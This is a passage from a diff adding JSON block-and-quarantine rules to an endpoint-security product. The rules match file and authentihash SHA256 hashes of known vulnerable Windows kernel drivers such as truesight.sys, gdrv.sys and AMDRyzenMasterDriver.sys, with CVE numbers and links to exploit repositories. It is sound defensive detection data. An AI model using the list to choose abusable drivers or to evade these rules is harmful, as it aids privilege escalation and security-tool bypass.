"710639fd1eb76520e8733840ad78a81e09ce03930e4d3c47998e3162ae95f90e", + "comment": "Vulnerable Kernel Driver (aka SSPORT.sys) [https://www.loldrivers.io/drivers/c854b612-0b9f-4fc3-a7b8-a93bed7a291e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d82de877-2da1-5cd5-80d9-b7179c3d58a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816137Z", + "creation_date": 
"2026-03-23T11:45:30.816139Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42446592b42e34bf569a631265bcaf2a2192d424531a343a7680f52199b88462", + "comment": "Vulnerable Kernel Driver (aka sysconp.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8397a5d-15cd-525a-8c02-7a9dabc96cae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478688Z", + "creation_date": "2026-03-23T11:45:31.478691Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478700Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e409afcc70f34df244e72837965371014212d6d705bbd650ee582f47b4189382", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"d83c2b3d-1676-5e8b-8814-083672f23a09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146349Z", + "creation_date": "2026-03-23T11:45:31.146351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f3c943f4f9924224f8b61f37d79c3a651c1dfeb1527a65e5798a9ae980293b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8408a07-9abf-59b0-bd5b-e8c5c24aa325", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156256Z", + "creation_date": "2026-03-23T11:45:31.156259Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.156264Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0036359ae6b581abc80fcbecd4169210907cbee598819ae3ad08f7f09af19b32", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d84a612e-e27c-5c3a-a86b-711a780d8113", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610458Z", + "creation_date": "2026-03-23T11:45:29.610460Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610465Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "592f56b13e7dcaa285da64a0b9a48be7562bd9b0a190208b7c8b7d8de427cf6c", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d84be08c-447a-57cc-a781-570026175ad0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619784Z", + "creation_date": "2026-03-23T11:45:29.619786Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619791Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5147b0f2ca9d0bde1f9fceb382c05f7fa9c333709d7bf081d6c00a4132d914af", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8611dc8-4ea4-549e-90ae-aa66eaf76def", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609465Z", + "creation_date": "2026-03-23T11:45:29.609467Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609472Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"12ae98c0f1d7209cffe3bc8be5b76aa1f4faba40af99a6dd299462cdd3820c94", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d895b4ba-43ce-5f56-8790-240e8c08db5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141838Z", + "creation_date": "2026-03-23T11:45:31.141840Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141845Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b06f8434efce1f2d72315e10ef48bc8a51bfdb4c69a016031a308369d5dd5c70", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8ae4c08-9bc3-55a2-b3aa-601508a855e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.975096Z", + "creation_date": "2026-03-23T11:45:29.975098Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8b128d4-8cbb-52c7-8a01-fd61c7a7033a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831055Z", + "creation_date": "2026-03-23T11:45:30.831057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831063Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93a14d935109917becd87acd891f5ae78a338adf7cec549868fafbc196ea642a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8b796fa-60c4-5daa-b43d-175b8463ae9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495237Z", + "creation_date": "2026-03-23T11:45:31.495240Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05888befb804daaf7f67e4cf96c366469b49aee0ca3bf4956295d13db533bfa8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8b96539-af8a-5cdb-b242-bbba819f7232", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.479944Z", + "creation_date": "2026-03-23T11:45:31.479956Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f6c870efde4f827da6bb59eb88004eab884f743049eea246cfe18b36585f675", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8ba2ba1-0832-5d47-b025-69a310dd8a2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606174Z", + "creation_date": "2026-03-23T11:45:29.606176Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86721ee8161096348ed3dbe1ccbf933ae004c315b1691745a8af4a0df9fed675", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8d38a5f-d117-50e0-9fe4-d06c9bebfe8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980430Z", + "creation_date": "2026-03-23T11:45:29.980432Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980437Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c925468c3376458d0e1ec65e097bd1a81a03901035c0195e8f6ef904ef3f901", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8dfcaf3-26a0-5fe2-b99b-3bfdacfa07a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140456Z", + "creation_date": "2026-03-23T11:45:31.140458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.140464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30dd053068d60984939e7af6a11d9d0ee2183ba92c7d389f6b2dc71cebc19e22",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8e44420-94f9-5b81-ac89-e9f596a6d793",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816317Z",
+ "creation_date": "2026-03-23T11:45:31.816320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "642478e28630c0f0d02526643315ac855bfb93ac347d8624883f92b6ec51623d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8fd6855-788c-5997-ac51-3578201c6a96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state":
"quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605909Z",
+ "creation_date": "2026-03-23T11:45:29.605911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c88b23dc0bdeeb244c125825865a7a8d9ef04ba4d62ecdd032c77dc6b6733ead",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9091cca-e0fc-555a-a5e3-0c6675b042fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481523Z",
+ "creation_date": "2026-03-23T11:45:30.481527Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+
"type": "hash",
+ "value": "0d133ced666c798ea63b6d8026ec507d429e834daa7c74e4e091e462e5815180",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9312b7e-aa4e-5cdb-ad4f-d4a43a58571a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826225Z",
+ "creation_date": "2026-03-23T11:45:30.826228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826233Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5652485eaad1e1a7256ce6e1c36f82ed449fc195cb892142705a783ba5a307eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d942b78d-b406-5159-89b1-f2034af0b065",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616415Z",
+ "creation_date": "2026-03-23T11:45:29.616417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b95b2d9b29bd25659f1c7ba5a187f8d23cde01162d9b5b1a2c4aea8f64b38441",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d945a062-6caa-5d1d-b45d-e7fc2ade1d7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494382Z",
+ "creation_date": "2026-03-23T11:45:31.494385Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494394Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb2ce27cd66ef89d1de4b9499425006efdd0e254b8ff5cc3c5c396d0e07f3a04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d946f879-9e3b-594c-9298-50cf1aa53361",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812926Z",
+ "creation_date": "2026-03-23T11:45:31.812928Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "053d2510fbed9c2a60e5a2f25de9bdc2e1b01a363d83fa02c9aeb6571f660575",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d95d6a86-6087-59c4-94ae-0e84cb553a45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827089Z",
+ "creation_date":
"2026-03-23T11:45:30.827091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e08d61ef600c05c47a5645d2234d19bce845071837af412be7b1176452e9678a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d963b275-14db-55a4-a648-81d5c4c6065c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
